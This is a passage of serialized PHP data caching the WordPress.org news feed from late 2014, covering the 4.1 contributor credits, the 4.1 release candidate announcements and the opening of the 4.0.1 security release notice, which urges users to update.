href=\"https://profiles.wordpress.org/jaimieolmstead\">jaimieolmstead</a>, <a href=\"https://profiles.wordpress.org/jakubtyrcha\">jakub.tyrcha</a>, <a href=\"https://profiles.wordpress.org/janhenckens\">janhenckens</a>, <a href=\"https://profiles.wordpress.org/avryl\">Janneke Van Dorpe</a>, <a href=\"https://profiles.wordpress.org/japh\">Japh</a>, <a href=\"https://profiles.wordpress.org/jwenerd\">Jared Wenerd</a>, <a href=\"https://profiles.wordpress.org/jarednova\">jarednova</a>, <a href=\"https://profiles.wordpress.org/jeanyoungkim\">jeanyoungkim</a>, <a href=\"https://profiles.wordpress.org/jfarthing84\">Jeff Farthing</a>, <a href=\"https://profiles.wordpress.org/jeffstieler\">Jeff Stieler</a>, <a href=\"https://profiles.wordpress.org/jeremyfelt\">Jeremy Felt</a>, <a href=\"https://profiles.wordpress.org/jeherve\">Jeremy Herve</a>, <a href=\"https://profiles.wordpress.org/jesin\">Jesin A</a>, <a href=\"https://profiles.wordpress.org/jayjdk\">Jesper Johansen (jayjdk)</a>, <a href=\"https://profiles.wordpress.org/engelen\">Jesper van Engelen</a>, <a href=\"https://profiles.wordpress.org/jessepollak\">Jesse Pollak</a>, <a href=\"https://profiles.wordpress.org/jipmoors\">jipmoors</a>, <a href=\"https://profiles.wordpress.org/joedolson\">Joe Dolson</a>, <a href=\"https://profiles.wordpress.org/joemcgill\">Joe McGill</a>, <a href=\"https://profiles.wordpress.org/johneckman\">John Eckman</a>, <a href=\"https://profiles.wordpress.org/johnrom\">johnrom</a>, <a href=\"https://profiles.wordpress.org/johnstonphilip\">johnstonphilip</a>, <a href=\"https://profiles.wordpress.org/jb510\">Jon Brown</a>, <a href=\"https://profiles.wordpress.org/duck_\">Jon Cave</a>, <a href=\"https://profiles.wordpress.org/jbrinley\">Jonathan Brinley</a>, <a href=\"https://profiles.wordpress.org/desrosj\">Jonathan Desrosiers</a>, <a href=\"https://profiles.wordpress.org/joostdevalk\">Joost de Valk</a>, <a href=\"https://profiles.wordpress.org/softmodeling\">Jordi Cabot</a>, <a href=\"https://profiles.wordpress.org/joshuaabenazer\">Joshua Abenazer</a>, <a href=\"https://profiles.wordpress.org/tai\">JOTAKI Taisuke</a>, <a href=\"https://profiles.wordpress.org/jrf\">jrf</a>, <a href=\"https://profiles.wordpress.org/julien731\">Julien Liabeuf</a>, <a href=\"https://profiles.wordpress.org/justinsainton\">Justin Sainton</a>, <a href=\"https://profiles.wordpress.org/jtsternberg\">Justin Sternberg</a>, <a href=\"https://profiles.wordpress.org/kadamwhite\">K.Adam White</a>, <a href=\"https://profiles.wordpress.org/trepmal\">Kailey (trepmal)</a>, <a href=\"https://profiles.wordpress.org/kamelkev\">kamelkev</a>, <a href=\"https://profiles.wordpress.org/karpstrucking\">karpstrucking</a>, <a href=\"https://profiles.wordpress.org/keesiemeijer\">keesiemeijer</a>, <a href=\"https://profiles.wordpress.org/ryelle\">Kelly Dwan</a>, <a href=\"https://profiles.wordpress.org/kevinlangleyjr\">Kevin Langley</a>, <a href=\"https://profiles.wordpress.org/kdoran\">Kiko Doran</a>, <a href=\"https://profiles.wordpress.org/kpdesign\">Kim Parsell</a>, <a href=\"https://profiles.wordpress.org/kwight\">Kirk Wight</a>, <a href=\"https://profiles.wordpress.org/kitchin\">kitchin</a>, <a href=\"https://profiles.wordpress.org/ixkaito\">Kite</a>, <a href=\"https://profiles.wordpress.org/knutsp\">Knut Sparhell</a>, <a href=\"https://profiles.wordpress.org/kovshenin\">Konstantin Kovshenin</a>, <a href=\"https://profiles.wordpress.org/obenland\">Konstantin Obenland</a>, <a href=\"https://profiles.wordpress.org/kosvrouvas\">Kostas Vrouvas</a>, <a href=\"https://profiles.wordpress.org/kraftner\">kraftner</a>, <a href=\"https://profiles.wordpress.org/kristastevens\">kristastevens</a>, <a href=\"https://profiles.wordpress.org/kurtpayne\">Kurt Payne</a>, <a href=\"https://profiles.wordpress.org/lancewillett\">Lance Willett</a>, <a href=\"https://profiles.wordpress.org/offereins\">Laurens Offereins</a>, <a href=\"https://profiles.wordpress.org/linuxologos\">linuxologos</a>, <a href=\"https://profiles.wordpress.org/ideag\">Liuiza Arunas</a>, <a href=\"https://profiles.wordpress.org/loushou\">loushou</a>, <a href=\"https://profiles.wordpress.org/latz\">Lutz Schroer</a>, <a href=\"https://profiles.wordpress.org/manoz69\">Manoz69</a>, <a href=\"https://profiles.wordpress.org/mantismamita\">mantismamita</a>, <a href=\"https://profiles.wordpress.org/marcosf\">Marco Schmoecker</a>, <a href=\"https://profiles.wordpress.org/nofearinc\">Mario Peshev</a>, <a href=\"https://profiles.wordpress.org/clorith\">Marius (Clorith)</a>, <a href=\"https://profiles.wordpress.org/landakram\">Mark Hudnall</a>, <a href=\"https://profiles.wordpress.org/markjaquith\">Mark Jaquith</a>, <a href=\"https://profiles.wordpress.org/senff\">Mark Senff</a>, <a href=\"https://profiles.wordpress.org/markoheijnen\">Marko Heijnen</a>, <a href=\"https://profiles.wordpress.org/marsjaninzmarsa\">marsjaninzmarsa</a>, <a href=\"https://profiles.wordpress.org/matveb\">Matias Ventura</a>, <a href=\"https://profiles.wordpress.org/matt\">Matt Mullenweg</a>, <a href=\"https://profiles.wordpress.org/mattwiebe\">Matt Wiebe</a>, <a href=\"https://profiles.wordpress.org/mboynes\">Matthew Boynes</a>, <a href=\"https://profiles.wordpress.org/mattheu\">Matthew Haines-Young</a>, <a href=\"https://profiles.wordpress.org/mattkeys\">mattkeys</a>, <a href=\"https://profiles.wordpress.org/mlteal\">Maura Teal</a>, <a href=\"https://profiles.wordpress.org/melchoyce\">Mel Choyce</a>, <a href=\"https://profiles.wordpress.org/merty\">Mert Yazicioglu</a>, <a href=\"https://profiles.wordpress.org/mdawaffe\">Michael Adams (mdawaffe)</a>, <a href=\"https://profiles.wordpress.org/michael-arestad\">Michael Arestad</a>, <a href=\"https://profiles.wordpress.org/tw2113\">Michael Beckwith</a>, <a href=\"https://profiles.wordpress.org/cainm\">Michael Cain</a>, <a href=\"https://profiles.wordpress.org/smashcut\">Michael Pick</a>, <a href=\"https://profiles.wordpress.org/michalzuber\">michalzuber</a>, <a href=\"https://profiles.wordpress.org/chellycat\">Michelle Langston</a>, <a href=\"https://profiles.wordpress.org/mcsf\">Miguel Fonseca</a>, <a href=\"https://profiles.wordpress.org/mikehansenme\">Mike Hansen</a>, <a href=\"https://profiles.wordpress.org/mikejolley\">Mike Jolley</a>, <a href=\"https://profiles.wordpress.org/mnelson4\">Mike Nelson</a>, <a href=\"https://profiles.wordpress.org/dh-shredder\">Mike Schroder</a>, <a href=\"https://profiles.wordpress.org/mikeyarce\">Mikey Arce</a>, <a href=\"https://profiles.wordpress.org/studionashvegas\">Mitch Canter (studionashvegas)</a>, <a href=\"https://profiles.wordpress.org/morganestes\">Morgan Estes</a>, <a href=\"https://profiles.wordpress.org/mor10\">Morten Rand-Hendriksen</a>, <a href=\"https://profiles.wordpress.org/mvd7793\">mvd7793</a>, <a href=\"https://profiles.wordpress.org/alex-ye\">Nashwan Doaqan</a>, <a href=\"https://profiles.wordpress.org/niallkennedy\">Niall Kennedy</a>, <a href=\"https://profiles.wordpress.org/celloexpressions\">Nick Halsey</a>, <a href=\"https://profiles.wordpress.org/nikv\">Nikhil Vimal (NikV)</a>, <a href=\"https://profiles.wordpress.org/nikolovtmw\">Nikola Nikolov</a>, <a href=\"https://profiles.wordpress.org/nobleclem\">nobleclem</a>, <a href=\"https://profiles.wordpress.org/noplanman\">noplanman</a>, <a href=\"https://profiles.wordpress.org/nvwd\">Nowell VanHoesen</a>, <a href=\"https://profiles.wordpress.org/originalexe\">OriginalEXE</a>, <a href=\"https://profiles.wordpress.org/p_enrique\">p_enrique</a>, <a href=\"https://profiles.wordpress.org/pushplaybang\">Paul</a>, <a href=\"https://profiles.wordpress.org/pauldewouters\">Paul de Wouters</a>, <a href=\"https://profiles.wordpress.org/paulschreiber\">Paul Schreiber</a>, <a href=\"https://profiles.wordpress.org/paulwilde\">Paul Wilde</a>, <a href=\"https://profiles.wordpress.org/pavelevap\">pavelevap</a>, <a href=\"https://profiles.wordpress.org/peterchester\">Peter Chester</a>, <a href=\"https://profiles.wordpress.org/donutz\">Peter J. Herrel</a>, <a href=\"https://profiles.wordpress.org/westi\">Peter Westwood</a>, <a href=\"https://profiles.wordpress.org/peterwilsoncc\">Peter Wilson</a>, <a href=\"https://profiles.wordpress.org/philiparthurmoore\">Philip Arthur Moore</a>, <a href=\"https://profiles.wordpress.org/phpmypython\">phpmypython</a>, <a href=\"https://profiles.wordpress.org/mordauk\">Pippin Williamson</a>, <a href=\"https://profiles.wordpress.org/nprasath002\">Prasath Nadarajah</a>, <a href=\"https://profiles.wordpress.org/psycleuk\">psycleuk</a>, <a href=\"https://profiles.wordpress.org/ptahdunbar\">Ptah Dunbar</a>, <a href=\"https://profiles.wordpress.org/quietnic\">quietnic</a>, <a href=\"https://profiles.wordpress.org/rachelbaker\">Rachel Baker</a>, <a href=\"https://profiles.wordpress.org/ramiy\">Rami Yushuvaev</a>, <a href=\"https://profiles.wordpress.org/ramiabraham\">ramiabraham</a>, <a href=\"https://profiles.wordpress.org/greuben\">Reuben Gunday</a>, <a href=\"https://profiles.wordpress.org/rianrietveld\">Rian Rietveld</a>, <a href=\"https://profiles.wordpress.org/richardmtl\">Richard Archambault</a>, <a href=\"https://profiles.wordpress.org/rickalee\">Ricky Lee Whittemore</a>, <a href=\"https://profiles.wordpress.org/miqrogroove\">Robert Chapin</a>, <a href=\"https://profiles.wordpress.org/rodrigosprimo\">Rodrigo Primo</a>, <a href=\"https://profiles.wordpress.org/ryan\">Ryan Boren</a>, <a href=\"https://profiles.wordpress.org/ryankienstra\">Ryan Kienstra</a>, <a href=\"https://profiles.wordpress.org/rmccue\">Ryan McCue</a>, <a href=\"https://profiles.wordpress.org/sakinshrestha\">Sakin Shrestha</a>, <a href=\"https://profiles.wordpress.org/samhotchkiss\">Sam Hotchkiss</a>, <a href=\"https://profiles.wordpress.org/otto42\">Samuel Wood (Otto)</a>, <a href=\"https://profiles.wordpress.org/sc0ttkclark\">Scott Kingsley Clark</a>, <a href=\"https://profiles.wordpress.org/coffee2code\">Scott Reilly</a>, <a href=\"https://profiles.wordpress.org/wonderboymusic\">Scott Taylor</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov\">Sergey Biryukov</a>, <a href=\"https://profiles.wordpress.org/shooper\">Shawn Hooper</a>, <a href=\"https://profiles.wordpress.org/simonp303\">Simon Pollard</a>, <a href=\"https://profiles.wordpress.org/simonwheatley\">Simon Wheatley</a>, <a href=\"https://profiles.wordpress.org/skaeser\">skaeser</a>, <a href=\"https://profiles.wordpress.org/slobodanmanic\">Slobodan Manic</a>, <a href=\"https://profiles.wordpress.org/socki03\">socki03</a>, <a href=\"https://profiles.wordpress.org/solarissmoke\">solarissmoke</a>, <a href=\"https://profiles.wordpress.org/stephdau\">Stephane Daury</a>, <a href=\"https://profiles.wordpress.org/netweb\">Stephen Edgar</a>, <a href=\"https://profiles.wordpress.org/stephenharris\">Stephen Harris</a>, <a href=\"https://profiles.wordpress.org/stevegrunwell\">Steve Grunwell</a>, <a href=\"https://profiles.wordpress.org/5um17\">Sumit Singh</a>, <a href=\"https://profiles.wordpress.org/tacoverdo\">TacoVerdo</a>, <a href=\"https://profiles.wordpress.org/iamtakashi\">Takashi Irie</a>, <a href=\"https://profiles.wordpress.org/miyauchi\">Takayuki Miyauchi</a>, <a href=\"https://profiles.wordpress.org/karmatosed\">Tammie</a>, <a href=\"https://profiles.wordpress.org/tareq1988\">Tareq Hasan</a>, <a href=\"https://profiles.wordpress.org/tlovett1\">Taylor Lovett</a>, <a href=\"https://profiles.wordpress.org/ipm-frommen\">Thorsten Frommen</a>, <a href=\"https://profiles.wordpress.org/tillkruess\">Till Kruss</a>, <a href=\"https://profiles.wordpress.org/tschutter\">Tobias Schutter</a>, <a href=\"https://profiles.wordpress.org/tobiasbg\">TobiasBg</a>, <a href=\"https://profiles.wordpress.org/tmtrademark\">Toby McKes</a>, <a href=\"https://profiles.wordpress.org/tjnowell\">Tom J Nowell</a>, <a href=\"https://profiles.wordpress.org/tomasm\">Tomas Mackevicius</a>, <a href=\"https://profiles.wordpress.org/tomharrigan\">TomHarrigan</a>, <a href=\"https://profiles.wordpress.org/topher1kenobe\">Topher</a>, <a href=\"https://profiles.wordpress.org/zodiac1978\">Torsten Landsiedel</a>, <a href=\"https://profiles.wordpress.org/liljimmi\">Tracy Levesque</a>, <a href=\"https://profiles.wordpress.org/transom\">transom</a>, <a href=\"https://profiles.wordpress.org/wpsmith\">Travis Smith</a>, <a href=\"https://profiles.wordpress.org/tywayne\">Ty Carlson</a>, <a href=\"https://profiles.wordpress.org/desaiuditd\">Udit Desai</a>, <a href=\"https://profiles.wordpress.org/umeshsingla\">Umesh Kumar</a>, <a href=\"https://profiles.wordpress.org/vinod-dalvi\">Vinod Dalvi</a>, <a href=\"https://profiles.wordpress.org/vlajos\">vlajos</a>, <a href=\"https://profiles.wordpress.org/voldemortensen\">voldemortensen</a>, <a href=\"https://profiles.wordpress.org/westonruter\">Weston Ruter</a>, <a href=\"https://profiles.wordpress.org/yoavf\">Yoav Farhi</a>, <a href=\"https://profiles.wordpress.org/nobinobi\">Yuta Sekine</a>, <a href=\"https://profiles.wordpress.org/zrothauser\">Zack Rothauser</a>, and <a href=\"https://profiles.wordpress.org/tollmanz\">Zack Tollman</a>.\n<p>There were 283 contributors to this release, again a new high.</p>\n<p>If you want to help out or follow along, check out <a href=\"https://make.wordpress.org/\">Make WordPress</a> and our <a href=\"https://make.wordpress.org/core/\">core development blog</a>.</p>\n<p>Thanks for choosing WordPress. Happy holidays and see you next year for version 4.2!</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://wordpress.org/news/2014/12/dinah/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WordPress 4.1 Release Candidate 3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate-3/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate-3/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 18 Dec 2014 02:22:15 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3411\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:429:\"The next release candidate for WordPress 4.1 is now available for testing. Seventy changes have gone in since the first release candidate. With no known issues left, we plan to release 4.1 tomorrow, December 18. To test, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can download the release candidate here (zip). If you’d like to learn more about […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"John Blackbourn\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1465:\"<p>The next release candidate for WordPress 4.1 is now available for testing.</p>\n<p><a href=\"https://core.trac.wordpress.org/log/trunk?rev=30961&stop_rev=30827\">Seventy changes</a> have gone in since the <a href=\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate/\">first release candidate</a>. With no known issues left, we plan to release 4.1 tomorrow, December 18.</p>\n<p>To test, try the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you’ll want “bleeding edge nightlies”). Or you can <a href=\"https://wordpress.org/wordpress-4.1-RC3.zip\">download the release candidate here</a> (zip). If you’d like to learn more about what’s new in WordPress 4.1, visit the updated About screen in your dashboard (<strong><img src=\"https://i0.wp.com/core.svn.wordpress.org/branches/3.6/wp-content/themes/twentyten/images/wordpress.png\" alt=\"\" width=\"16\" height=\"16\" /> → About</strong> in the toolbar) and also check out <a href=\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/\">the Beta 1 post</a>.</p>\n<p><strong>Plugin authors:</strong> Remember to test your plugins against 4.1, and if they’re compatible, make sure they are marked as tested up to 4.1. Be sure to follow along the core development blog; we’ve been posting <a href=\"https://make.wordpress.org/core/tag/4-1-dev-notes/\">notes for developers for 4.1</a> as always.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate-3/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"WordPress 4.1 Release Candidate\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 11 Dec 2014 11:52:16 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:3:\"4.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3375\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:341:\"The release candidate for WordPress 4.1 is now available. We’ve made a lot of refinements over the last few weeks. RC means we think we’re done, but with millions of users and thousands of plugins and themes, it’s possible we’ve missed something. We hope to ship WordPress 4.1 on Tuesday, December 16, but we need your […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"John Blackbourn\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2301:\"<p>The release candidate for WordPress 4.1 is now available.</p>\n<p>We’ve made a lot of refinements over the last few weeks. RC means we think we’re done, but with millions of users and thousands of plugins and themes, it’s possible we’ve missed something. We hope to ship WordPress 4.1 on Tuesday, December 16, but we need your help to get there. If you haven’t tested 4.1 yet, now is the time! (Please though, not on your live site unless you’re adventurous.)</p>\n<p><strong>Think you’ve found a bug?</strong> Please post to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta support forum</a>. If any known issues come up, you’ll be able to <a href=\"https://core.trac.wordpress.org/report/5\">find them here</a>.</p>\n<p>To test WordPress 4.1 RC1, you can use the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin or you can <a href=\"https://wordpress.org/wordpress-4.1-RC1.zip\">download the release candidate here</a> (zip). If you’d like to learn more about what’s new in WordPress 4.1, visit the About screen in your dashboard (<strong><img src=\"https://i0.wp.com/core.svn.wordpress.org/branches/3.6/wp-content/themes/twentyten/images/wordpress.png\" alt=\"\" width=\"16\" height=\"16\" /> → About</strong> in the toolbar) or check out the <a href=\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/\">beta announcement</a>.</p>\n<p><strong>Developers</strong>, please test your plugins and themes against WordPress 4.1 and update your plugin’s <em>Tested up to</em> version in the readme to 4.1 before next week. If you find compatibility problems, we never want to break things, so please be sure to post to the support forums so we can figure those out before the final release.</p>\n<p>Be sure to <a href=\"https://make.wordpress.org/core/\">follow along the core development blog</a>, where we’ll continue to post <a href=\"https://make.wordpress.org/core/tag/4-1-dev-notes/\">notes for developers</a> for 4.1. (For example: if you’ve written a child theme for Twenty Fifteen, some of the new pagination functions have been renamed for clarity.)</p>\n<p><em>Testing four point one</em><br />\n<em>Why are we up at this hour?</em><br />\n<em>Code is poetry</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"WordPress 4.0.1 Security Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/news/2014/11/wordpress-4-0-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/news/2014/11/wordpress-4-0-1/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Nov 2014 18:55:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3363\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:345:\"WordPress 4.0.1 is now available. This is a critical security release for all previous versions and we strongly encourage you to update your sites immediately. Sites that support automatic background updates will be updated to WordPress 4.0.1 within the next few hours. If you are still on WordPress 3.9.2, 3.8.4, or 3.7.4, you will be […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Andrew Nacin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3395:\"<p>WordPress 4.0.1 is now available. This is a <strong>critical security release</strong> for all previous versions and we strongly encourage you to update your sites immediately.</p>\n<p>Sites that support automatic background updates will be updated to WordPress 4.0.1 within the next few hours. If you are still on WordPress 3.9.2, 3.8.4, or 3.7.4, you will be updated to 3.9.3, 3.8.5, or 3.7.5 to keep everything secure. (We don’t support older versions, so please update to 4.0.1 for the latest and greatest.)</p>\n<p>WordPress versions 3.9.2 and earlier are affected by a critical cross-site scripting vulnerability, which could enable anonymous users to compromise a site. This was reported by <a href=\"http://klikki.fi/\">Jouko Pynnonen</a>. This issue does not affect version 4.0, but version 4.0.1 does address these eight security issues:</p>\n<ul>\n<li>Three cross-site scripting issues that a contributor or author could use to compromise a site. 